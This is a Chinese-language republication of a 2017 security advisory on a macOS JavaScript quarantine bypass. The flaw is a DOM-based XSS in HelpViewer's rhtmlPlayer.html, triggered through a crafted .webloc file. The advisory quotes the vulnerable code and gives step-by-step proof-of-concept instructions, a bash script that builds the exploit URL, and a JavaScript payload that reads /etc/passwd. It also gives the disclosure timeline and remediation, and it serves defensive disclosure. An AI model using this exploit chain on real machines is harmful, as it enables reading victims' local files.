Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【漏洞预警】Mac OS X存在Javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)

$
0
0
【漏洞预警】Mac OS X存在javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)

2017-09-28 21:42:18

阅读:3676次
点赞(0)
收藏
来源: wearesegment.com





【漏洞预警】Mac OS X存在Javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)

作者:興趣使然的小胃





【漏洞预警】Mac OS X存在Javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)

译者:興趣使然的小胃

预估稿费:120RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


漏洞概要

漏洞名称:Mac OS X本地Javascript隔离绕过漏洞(可读取本地文件)

影响产品:Mac OS X

影响版本:10.12, 10.11, 10.10及之前的版本也可能受到该漏洞的影响

影响厂商:apple.com

漏洞类型:DOM Based XSS

风险等级:3 / 5

漏洞发现者:Filippo Cavallarin - wearesegment.com

CVE编号:N/A

通知厂商日期:2017-07-15

厂商修复日期:2017-09-25

漏洞公开日期:2017-09-28


漏洞细节

Mac OS X存在一个漏洞,利用这个漏洞,攻击者可以绕过Apple的隔离机制,不受任何限制执行任意Javascript代码。

Apple隔离机制的原理是在下载的文件上设置一个扩展属性,以便系统在受限环境中打开或者执行这些文件(从下载的归档文件或者图像中提取的文件也适用于这种场景)。举个例子,被隔离的html文件无法加载本地资源。

该漏洞存在于某个html文件中,这个文件是Mac OS X内核的一部分,容易受到基于DOM的XSS攻击影响,最终导致在(未受限)上下文中执行任意Javascript命令。


演示视频

该文件的具体路径为:“/System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html”,文件包含如下代码:
<script type="text/javascript" charset="utf-8"> setBasePathFromString(urlParam("rhtml")); loadLocStrings(); loadJavascriptLibs(); function init () { /* <-- called by <body onload="init()" */ [...] rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */ [...] self.contentHttpReq.open('GET', rHTMLPath, true); self.contentHttpReq.onreadystatechange = function() { if (self.contentHttpReq.readyState == 4) { loadTutorial(self.contentHttpReq.responseText); } } [...] } function loadTutorial(response) { var rHTMLPath = urlParam("rhtml"); // this will create a tutorialData item eval(response); [...] } function loadLocStrings() { var headID = document.getElementsByTagName("head")[0]; var rHTMLPath = urlParam("rhtml"); rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js"); var newScript = document.createElement('script'); newScript.type = 'text/javascript'; newScript.src = rHTMLPath; headID.appendChild(newScript); } [...] </script>

简而言之,这段代码会从“rhtml”查询字符串参数中提取url地址,然后向该地址发起请求,将响应数据作为javascript代码加以执行。

这段代码中包含两段不同的基于DOM的XSS代码。

第一段代码位于loadLocStrings()函数内,该代码创建了一个SCRIPT元素,使用“rhtml”参数作为“src”的属性。

第二段代码位于init()函数内,使用“rhtml”参数发起ajax调用,然后将响应数据直接传递个eval()进行处理。

这样做的结果就是同样的载荷会被执行两次。

攻击者只要提供一个包含恶意数据的uri,就能控制响应数据,进而控制执行语句。

攻击者可以使用.webloc文件来利用这个漏洞。通常情况下,这类文件包含url地址,使用Safari打开这类文件时,它们会自动加载这个url地址。

攻击者可以构造一个.webloc文件,诱导受害者打开这个文件,然后就可以在受害者主机上执行高权限javascript命令。

由于.webloc文件同样会使用扩展属性来存储数据,因此攻击者需要将这类文件存放在tar归档文件中再发送给受害者(也可以存储在其他支持扩展属性的文件中)。


PoC

如果要重现这个漏洞,我们需要执行如下操作:

1、创建一个在目标上执行的javascript文件。

2、使用base64对文件内容进行编码。

3、将其编码为“uri组件(uri component)”(例如,我们可以使用encodeURIComponent这个js函数完成这一任务)。

4、利用这段数据构造如下形式的uri:

data:text/plain;base64,<urlencoded base64>

5、在开头添加如下字符串:

file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=

6、使用Safari打开这个地址。

7、将其保存为书签。

8、将该书签拖放到Finder中(此时会创建一个.webloc文件,如果扩展名不是.webloc,需要重命名为正确的扩展名)。

9、创建一个tar归档文件,包含这个.webloc文件。

10、将归档文件发送给受害者。

需要注意的是,受限于rhtmlPlayer.html的处理流程,为了访问本地资源,我们所构造的javascript代码中第一行必须为:document.getElementsByTagName("base")[0].href=""。

我们可以使用如下bash脚本,将某个javascript文件转化为最终可利用的“file” url地址:

#!/bin/bash BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=" BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;" DATAURI="data:text/plain;base64," JSFILE=$1 if [ "$JSFILE" = "" ]; then echo "usage: $0 " exit 1 fi JS=$BASEJS`cat $JSFILE`"})();" ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'` URL="$BASEURL""$DATAURI""$ENCJS" echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"

使用如下javascript代码,我们可以在受害者主机上显示“/etc/passwd”文件内容:

xhr = new XMLHttpRequest(); xhr.open("GET", "/etc/passwd", true); xhr.onreadystatechange = function(){ if (xhr.readyState == 4) { alert(xhr.responseText); } }; xhr.send();

需要注意的是,只有Safari才能通过ajax成功加载本地资源(Chrome以及Firefox不行)。对我们来说这并不是个问题,因为在这个漏洞利用过程中,只有Safari会打开.webloc文件。


备注

在本文成稿时,新版的Mac OS X High Sierra中悄悄修复了这个漏洞,因此Apple的更新日志中没有提到这个bug。

Apple没有为这个漏洞分配CVE编号。


解决办法

请更新至Mac OS X High Sierra,或者删除rhtmlPlayer.html以修复这个漏洞。


漏洞状态

Securiteam安全披露计划已公布了该漏洞,具体地址为:http://www.beyondsecurity.com/ssd 。



【漏洞预警】Mac OS X存在Javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)
【漏洞预警】Mac OS X存在Javascript沙箱绕过漏洞,可造成任意文件读取!(含PoC)
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images